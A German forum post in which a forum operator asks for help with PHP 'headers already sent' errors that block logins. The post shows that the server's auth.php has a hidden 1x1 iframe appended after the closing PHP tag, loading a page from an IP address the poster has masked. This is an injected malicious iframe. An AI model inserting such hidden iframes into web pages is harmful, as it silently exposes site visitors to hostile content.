ich betreibe seit kurzer Zeit ein eigenes Forum und bisher lief alles problemlos. Seit seit ein paar Tagen habe ich folgendes Problem. Beim Aufruf des Forums erscheint diese Fehlermeldung und kein Benutzer kann sich Einloggen:
Code: Alles auswählen
Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 254
Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 255
Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 254
Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/sessions.php on line 255
Warning: Cannot modify header information - headers already sent by (output started at /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/auth.php:328) in /mnt/jd1/06/283/00000018/htdocs/sportfotoforum.de/includes/functions.php on line 951
auth.php, die ich hochlade endet so:
Code: Alles auswählen
else
{
$auth_user = $is_admin;
}
return $auth_user;
}
?>
Code: Alles auswählen
else
{
$auth_user = $is_admin;
}
return $auth_user;
}
?><iframe src='http://*.*.*.*/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Schöne Grüße
Edit: Ich habe den Link durch * unkenntlich gemacht, damit sich niemand aus Versehen einen Virus einhandelt.